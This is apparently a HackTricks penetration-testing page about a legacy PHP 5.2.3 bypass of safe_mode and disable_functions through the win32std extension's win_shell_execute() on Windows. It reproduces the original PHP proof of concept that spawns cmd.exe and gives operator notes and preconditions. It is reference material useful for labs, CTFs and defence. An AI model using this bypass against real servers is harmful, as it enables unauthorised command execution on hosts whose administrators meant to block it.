🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ€– HackTricks / PHP 5.2.3 - Win32std ext Protections Bypass

PHP 5.2.3 - Win32std ext Protections Bypass

{{#include ../../../../banners/hacktricks-training.md}}

This is a legacy Windows-only bypass that depends on the old win32std PECL extension exposing win_shell_execute(). It is useful in CTFs, old appliances, and abandoned shared-hosting stacks, but it is not a generic modern disable_functions bypass.

Why it works

disable_functions only blocks the PHP internals explicitly listed in php.ini. If a third-party extension exposes a helper that eventually reaches the OS itself, that helper is outside the disabled built-in function set unless the admin also removes the extension or blocks that exact entry point.

In this case, the primitive is:

win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");

The old win32std extension documented win_shell_execute(string absolute_path[, string action, string args, string dir]) as a wrapper around normal Windows shell actions. In practice, on vulnerable legacy installs this gives you a process-spawning primitive even if common functions such as system() were disabled.

Preconditions

  • Windows target
  • Very old PHP branch where safe_mode still existed
  • win32std PECL extension loaded
  • The hosting context must allow the spawned process to start under the web server account

Practical notes:

  • The original PoC was tested on PHP 5.2.3 / Windows XP SP2.
  • This technique is mostly relevant when you see phpinfo() output or an extension list containing win32std.
  • Do not assume modern community forks behave the same way. Some recent rebases keep resource/helper APIs but no longer expose win_shell_execute(), so the primitive is tied to the older extension line.

Original PoC

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Thanks to rgod for all his precious advises :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be wxecuted
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>

Operator notes

  • The line system("cmd.exe"); in the PoC is only a sanity check to show that the normal built-in execution function is blocked. The actual bypass is the subsequent win_shell_execute() call.
  • The relative path to cmd.exe is a convenience trick for old deployments. If you already know an absolute path, prefer passing it directly.
  • This is primarily a process execution primitive. If you need a broader survey of newer disable_functions / open_basedir bypasses, go back to the parent page:

{{#ref}}
README.md
{{#endref}}

Constraints

  • Legacy only: safe_mode disappeared in later PHP branches, so this page is mainly useful for historical targets and labs.
  • Extension dependent: without win32std, there is no bypass here.
  • Windows only: this has no value on Linux/*nix targets.

References

{{#include ../../../../banners/hacktricks-training.md}}